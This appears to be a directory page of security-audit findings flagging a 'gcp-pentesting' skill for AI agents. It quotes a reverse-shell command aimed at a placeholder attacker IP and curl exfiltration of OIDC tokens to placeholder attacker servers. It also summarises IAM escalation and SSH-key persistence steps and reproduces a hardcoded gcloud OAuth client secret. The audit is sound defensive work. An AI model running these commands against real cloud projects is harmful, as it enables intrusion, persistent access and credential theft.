The Agent Skills Directory

[REMOTE_CODE_EXECUTION]: The skill provides explicit instructions for establishing reverse shells on Compute Engine instances. Specifically, it demonstrates injecting a startup script that uses Bash redirection to connect to an attacker-controlled IP address and port ('bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &').
[DATA_EXFILTRATION]: Multiple sections describe techniques for exfiltrating sensitive data, such as OIDC tokens and system logs, to external endpoints. This includes using curl to send data to placeholders like 'https://ATTACKER_SERVER/collect' and 'https://ATTACKER_SERVER/beacon'.
[COMMAND_EXECUTION]: The methodology is heavily centered on executing shell commands to manipulate cloud resources. It includes instructions for creating Service Account keys, modifying IAM policies to grant administrative roles, and injecting SSH keys into project metadata to gain persistent access across all virtual machines.
[CREDENTIALS_UNSAFE]: The skill contains a hardcoded OAuth client secret ('ZmssLNjJy2998hD4CTg2ejr2') associated with the gcloud CLI. While this is a known public secret for the utility, its presence in a script used for automated tasks is a security concern.
[REMOTE_CODE_EXECUTION]: The documentation encourages the download and execution of several third-party security tools and scripts (e.g., 'gcp_scanner', 'gcpwn', 'cloud_enum.py', 'gcpbucketbrute.py') from unverified sources without integrity checks or version pinning.

gcp-pentesting